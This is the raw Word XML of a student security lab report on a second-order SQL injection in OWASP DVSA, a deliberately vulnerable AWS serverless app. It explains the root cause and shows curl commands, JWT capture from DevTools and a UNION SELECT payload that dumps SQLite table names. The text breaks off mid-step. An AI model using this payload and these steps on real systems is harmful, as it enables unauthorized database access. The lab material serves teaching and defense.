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4459" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFA5ED1" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C80787" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67581ECC" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CEC829" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467776F4" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRPr="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730F3EA2" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E13FC43" w14:textId="73147667" w:rsidR="005C76E2" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>ICS-344</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D0CB2" w14:textId="2FEFD8D9" w:rsidR="00F24FB8" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Section 02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B3D9B" w14:textId="77777777" w:rsidR="00533DCD" w:rsidRDefault="00533DCD" w:rsidP="00533DCD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ali Kamal Aloryd 202322750</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C972CD1" w14:textId="77777777" w:rsidR="00533DCD" w:rsidRDefault="00533DCD" w:rsidP="00533DCD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Redha Abdulaziz Alturaik 20232301</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F08AC" w14:textId="77777777" w:rsidR="00533DCD" w:rsidRDefault="00533DCD" w:rsidP="00533DCD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00EE5F9B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>http://dvsa-website-test-546079881937-us-east-1.s3-website.us-east-1.amazonaws.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="259F9873" w14:textId="77777777" w:rsidR="00533DCD" w:rsidRDefault="00533DCD" w:rsidP="00533DCD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5F9B">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>us-east-1 (N. Virginia)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1A2F6" w14:textId="02DDF554" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005052DF">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>3 May 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF9714E" w14:textId="34027C41" w:rsidR="00CF3286" w:rsidRDefault="00533DCD" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533DCD">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Second-Order SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507680AE" w14:textId="03F26F8F" w:rsidR="00142AD2" w:rsidRDefault="00533DCD" w:rsidP="00CF3286">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00533DCD">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Extra Vulnerability #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA9F9A" w14:textId="6E176124" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F68C1B" w14:textId="7ED3285E" w:rsidR="00F24FB8" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D4B2A" w14:textId="24E899C6" w:rsidR="00C922FF" w:rsidRDefault="00C922FF" w:rsidP="00C922FF">
      <w:r>
        <w:t>This extra vulnerability demonstrates a Second-Order SQL Injection in the DVSA order/cart workflow. The affected path is the order pipeline handled through API Gateway, Lambda, and backend storage. The attacker first submits malicious item data during order creation. The payload does not execute immediately. Instead, it is stored as part of the order data and later reused by another backend Lambda function, likely DVSA-GET-CART-TOTAL, when calculating the cart total during billing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CD5CE" w14:textId="4B7978DA" w:rsidR="00BA72A1" w:rsidRDefault="00C922FF" w:rsidP="00C922FF">
      <w:r>
        <w:t>The security impact is that attacker-controlled stored data can influence a backend SQL query at a later stage. This may expose internal database metadata, manipulate business logic, or cause backend errors. The weakness is unsafe reuse of stored user input in a later SQL query without validation or parameterized queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18516498" w14:textId="3122E45C" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Why This Works / Root Caus</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FEDB89" w14:textId="52F701C1" w:rsidR="006F4AB2" w:rsidRDefault="006F4AB2" w:rsidP="006F4AB2">
      <w:r>
        <w:t>This attack works because the application treats stored cart item identifiers as trusted data. The attacker submits a malicious item value during the “new order” stage. The value is saved as part of the order. Later, when the billing/cart-total Lambda reads the saved order items, it builds a SQL query using string concatenation instead of a safe parameterized query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250E6DF" w14:textId="39277FDD" w:rsidR="006F4AB2" w:rsidRDefault="006F4AB2" w:rsidP="0008558F">
      <w:r>
        <w:t>The main root cause is:User-controlled data is stored in one workflow stage and later reused as part of a SQL query without strict validation or parameter binding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D582227" w14:textId="44B5B16F" w:rsidR="00BA72A1" w:rsidRDefault="006F4AB2" w:rsidP="006F4AB2">
      <w:r>
        <w:t>This is called second-order injection because the payload is not triggered at the first request. It becomes dangerous only when another backend process reads and executes it later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63819883" w14:textId="7E53F04B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Environment and Setu</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F4AB2" w14:paraId="7D9E7990" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B01DD8E" w14:textId="11153F58" w:rsidR="006F4AB2" w:rsidRPr="006F4AB2" w:rsidRDefault="006F4AB2" w:rsidP="006F4AB2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F4AB2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="319D60FC" w14:textId="16172037" w:rsidR="006F4AB2" w:rsidRPr="006F4AB2" w:rsidRDefault="006F4AB2" w:rsidP="006F4AB2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F4AB2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F4AB2" w14:paraId="70A2EC10" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43AA773B" w14:textId="169EE547" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DACFE41" w14:textId="393AB46C" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>OWASP DVSA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F4AB2" w14:paraId="1CAAFA0F" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="354703BF" w14:textId="4EA81BDB" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>AWS Region</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00677974" w14:textId="1BA1A22F" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>us-east-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F4AB2" w14:paraId="57508B0B" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6647DDA7" w14:textId="2E4E2498" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Entry Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E0F2D7A" w14:textId="03F54830" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>API Gateway /order endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F4AB2" w14:paraId="033B8048" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47F30A39" w14:textId="3AA3D526" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Main Lambda Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DC15C1" w14:textId="41F7C48E" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>DVSA-ORDER-MANAGER, DVSA-GET-CART-TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F4AB2" w14:paraId="74A2D9E7" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB5049A" w14:textId="1EF515D4" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Evidence Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="677E557F" w14:textId="35541BC6" w:rsidR="006F4AB2" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>CloudWatch Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0008558F" w14:paraId="624EABA5" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76ED9FA0" w14:textId="36254E8E" w:rsidR="0008558F" w:rsidRPr="0008558F" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Key Log Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1511AE0B" w14:textId="48A33ECE" w:rsidR="0008558F" w:rsidRPr="0008558F" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>/aws/lambda/DVSA-GET-CART-TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0008558F" w14:paraId="2F69DB1A" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38BEBE0A" w14:textId="6F661986" w:rsidR="0008558F" w:rsidRPr="0008558F" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088D4A59" w14:textId="6D54D47D" w:rsidR="0008558F" w:rsidRPr="0008558F" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Browser DevTools, curl, jq, AWS Console, CloudWatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0008558F" w14:paraId="7B3E0245" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="290B2E7F" w14:textId="66DE1403" w:rsidR="0008558F" w:rsidRPr="0008558F" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Account Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D038625" w14:textId="0E501BD8" w:rsidR="0008558F" w:rsidRPr="0008558F" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Normal authenticated DVSA user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0008558F" w14:paraId="25AFE03B" w14:textId="77777777" w:rsidTr="006F4AB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="336BEF99" w14:textId="152FD361" w:rsidR="0008558F" w:rsidRPr="0008558F" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Required Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED392B4" w14:textId="5A613EFD" w:rsidR="0008558F" w:rsidRPr="0008558F" w:rsidRDefault="0008558F" w:rsidP="0008558F">
            <w:r w:rsidRPr="0008558F">
              <w:t>Valid JWT token and API endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51160CAF" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="5FB854CB" w14:textId="6FBB58DB" w:rsidR="00EB4FD7" w:rsidRDefault="00EB4FD7" w:rsidP="006568BA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Set these variables in Kali/Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99E935" w14:textId="6E2BE38A" w:rsidR="00EB4FD7" w:rsidRDefault="00EB4FD7" w:rsidP="00EB4FD7">
      <w:r>
        <w:t>export API="https://YOUR_API_ID.execute-api.us-east1.amazonaws.com/YOUR_STAGE/order"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2EC2D1" w14:textId="54945A96" w:rsidR="00EB4FD7" w:rsidRDefault="00EB4FD7" w:rsidP="00EB4FD7">
      <w:r>
        <w:t>export TOKEN="PASTE_YOUR_VALID_JWT_HERE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C00F386" w14:textId="08D3D205" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF032F" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>04. Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0389E357" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450"/>
    <w:p w14:paraId="37856D77" w14:textId="519A968B" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>Step 1 — Capture the API endpoint and authorization token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C822DB4" w14:textId="328E3148" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>First, I logged in to DVSA using a normal user account. Then I opened the browser Developer Tools, went to the Network tab, and performed an order-related action. From the /order request, I copied the API Gateway endpoint and the Authorization token. These values were saved in Kali as environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59204B53" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>export API="https://[REDACTED].execute-api.us-east-1.amazonaws.com/[STAGE]/order"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF3E90" w14:textId="14056862" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>export TOKEN="[REDACTED]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799EA7B" w14:textId="2E82272F" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>Step 2 — Plant the second-order SQL injection payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0844B9D0" w14:textId="5225F6A9" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>A malicious cart item was submitted during the new order stage. The injected value was placed inside the item identifier field. At this stage, the payload was only stored as part of the order data and did not immediately execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9926EB" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>curl -s -X POST "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176F4B7" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>-H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96E72D" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>-H "Authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF1B1DA" w14:textId="1574A144" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>--data-binary @payload.json | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD4425" w14:textId="365B6873" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>The payload file contained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C20DA" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2503C4" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  "action": "new",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E555C" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  "cart-id": "hacked-cart-003",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED9E7C" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  "items": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5E2C0" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">    "1 UNION SELECT 1, GROUP_CONCAT(name), 0 FROM sqlite_master WHERE type='table'": 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E38A236" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AB18D" w14:textId="6BC2C6D6" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A918D9" w14:textId="2A52EF63" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>The API returned a new order ID, which was saved using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2B1EFE" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>export ORDER_ID="2e85ac7f-ad61-4a62-a4c9-2ff4c03ff195"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25423FC9" w14:textId="4AB67551" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>echo $ORDER_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DE6715" w14:textId="54BF81C9" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>Step 3 — Add shipping details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED50FED" w14:textId="51E2E24C" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>After creating the order, I submitted shipping details to move the order forward in the workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED0EBC3" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>curl -s -X POST "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF16A90" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>-H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91DE2C" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>-H "Authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604F8E0" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>--data-raw "{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CCA0BD" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  \"action\": \"shipping\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F33C6" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  \"order-id\": \"$ORDER_ID\",</w:t>
      </w:r>
    </w:p>
